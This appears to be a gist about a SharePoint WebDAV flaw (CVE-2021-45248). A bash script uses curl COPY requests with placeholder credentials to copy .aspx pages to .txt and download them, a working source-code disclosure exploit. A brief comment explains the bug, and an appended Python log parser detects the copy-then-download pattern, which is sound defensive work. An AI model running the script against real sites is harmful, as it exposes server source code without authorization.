Gist: Arkango/448ccb8da61c7fc752da08bc21c609d7
Created June 28, 2023 07:44
Sharepoint CVE-2021-45248 exploitation
```bash
# $1: file with links retrieved from the history, each ending in .aspx
# also try filename.cs.aspx
i=0
mkdir -p out
# read one link per line so URLs are not word-split or glob-expanded
while IFS= read -r l
do
  [ -n "$l" ] || continue
  i=$((i+1))
  # copy the file from aspx to txt
  curl -X COPY "$l" --ntlm --negotiate -u "<credentials>" -H "Destination: /<path of the site>/Hometest$i.txt" -k -x http://127.0.0.1:8080
  # get the content and save
  curl "https://<targetsite>/Hometest$i.txt" -o "./out/$i.txt" -k --ntlm --negotiate -u "<credentials>" -x http://127.0.0.1:8080
done < "$1"
```
Can you provide more information on what the actual vulnerability is here?
When the copy or move option is enabled, you can copy .aspx files to txt.
Then see that to perform a source code disclosure.
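A detection-side view of the behaviour described in the comment above, as an added example that is not part of the gist: it scans web server logs in W3C extended format for COPY or MOVE requests against `.aspx` files and correlates each successful one with a later `.txt` download by the same client. The log excerpt, the field selection, the five-minute window and all function names are assumptions made for this example; the sample does not log the `Destination` header, so the correlation relies on the follow-up GET.

```python
from datetime import datetime, timedelta

# Constructed log excerpt: documentation IP ranges, made-up users and paths.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-username c-ip sc-status
2023-06-28 07:41:10 COPY /sites/demo/Pages/Home.aspx bob 203.0.113.5 201
2023-06-28 07:41:12 GET /sites/demo/Hometest1.txt bob 203.0.113.5 200
2023-06-28 07:42:00 COPY /sites/demo/Docs/report.docx alice 198.51.100.7 201
2023-06-28 07:50:00 GET /sites/demo/notes.txt alice 198.51.100.7 200
2023-06-28 07:55:30 MOVE /sites/demo/Pages/Admin.aspx bob 203.0.113.5 403
"""

COPY_METHODS = {"COPY", "MOVE"}      # WebDAV methods named in the comment
STATIC_EXTS = (".txt",)              # extension the gist copies to; extend as needed
WINDOW = timedelta(minutes=5)        # assumed correlation window


def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            row = dict(zip(fields, line.split()))
            row["ts"] = datetime.strptime(f"{row['date']} {row['time']}", "%Y-%m-%d %H:%M:%S")
            yield row


def find_aspx_copies(text, window=WINDOW):
    """Return (client, method, source, status, fetched) for each COPY/MOVE on .aspx."""
    rows = list(parse_w3c(text))     # assumes the log is in time order
    findings = []
    for i, r in enumerate(rows):
        if r["cs-method"] not in COPY_METHODS or not r["cs-uri-stem"].lower().endswith(".aspx"):
            continue
        fetched = None
        if r["sc-status"].startswith("2"):
            # Successful copy: look for the same client downloading a static file soon after.
            for later in rows[i + 1:]:
                if later["ts"] - r["ts"] > window:
                    break
                if (later["c-ip"] == r["c-ip"] and later["cs-method"] == "GET" and later["sc-status"] == "200"
                        and later["cs-uri-stem"].lower().endswith(STATIC_EXTS)):
                    fetched = later["cs-uri-stem"]
                    break
        findings.append((r["c-ip"], r["cs-method"], r["cs-uri-stem"], r["sc-status"], fetched))
    return findings

if __name__ == "__main__":
    print(*find_aspx_copies(SAMPLE_LOG), sep="\n")
```

A finding with a non-empty last element is the copy-then-download pattern; a finding with `None` is a COPY or MOVE attempt on a page that is still worth reviewing, since ordinary document copies do not target `.aspx` files.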